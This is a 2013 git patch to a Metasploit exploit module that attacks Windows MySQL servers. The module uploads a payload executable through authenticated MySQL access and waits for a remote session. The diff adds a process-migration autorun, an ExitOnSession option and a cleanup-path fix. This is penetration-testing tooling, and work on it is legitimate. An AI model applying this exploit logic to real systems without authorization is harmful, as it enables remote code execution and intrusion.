From 7bbdc8c0dc050a1d1d6bff0e445c7cb5cb3dc7a2 Mon Sep 17 00:00:00 2001 From: Sean Verity Date: Thu, 25 Jul 2013 21:37:17 -0400 Subject: [PATCH] Couple of minor fixes and steps towards payload cleanup. --- modules/exploits/windows/mysql/mysql_start_up.rb | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb index 315430bf43..e42be0b3b0 100644 --- a/modules/exploits/windows/mysql/mysql_start_up.rb +++ b/modules/exploits/windows/mysql/mysql_start_up.rb @@ -28,6 +28,10 @@ class Metasploit3 < Msf::Exploit::Remote 'sinn3r', 'Sean Verity + { + 'InitialAutoRunScript' => "migrate -f" + }, 'License' => MSF_LICENSE, 'References' => [ @@ -45,6 +49,10 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('USERNAME', [ true, 'The username to authenticate as']), OptString.new('PASSWORD', [ true, 'The password to authenticate with']) ]) + register_advanced_options( + [ + OptBool.new('ExitOnSession', [ false, 'Turn off handler once session is created', true]) + ]) end def check @@ -113,13 +121,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Uploading to '#{dest}'") begin upload_file(exe, dest) - register_file_for_cleanup("#{exe_name}") + register_file_for_cleanup("#{dest}") rescue RbMysql::AccessDeniedError print_error("#{peer} - No permission to write. I blame kc :-)") return end - if not datastore['ExitOnSession'] and not job_id fail_with(Exploit::Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)") end @@ -129,11 +136,8 @@ class Metasploit3 < Msf::Exploit::Remote while(true) break if session_created? and datastore['ExitOnSession'] break if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) ) - select(nil,nil,nil,1) end - - end end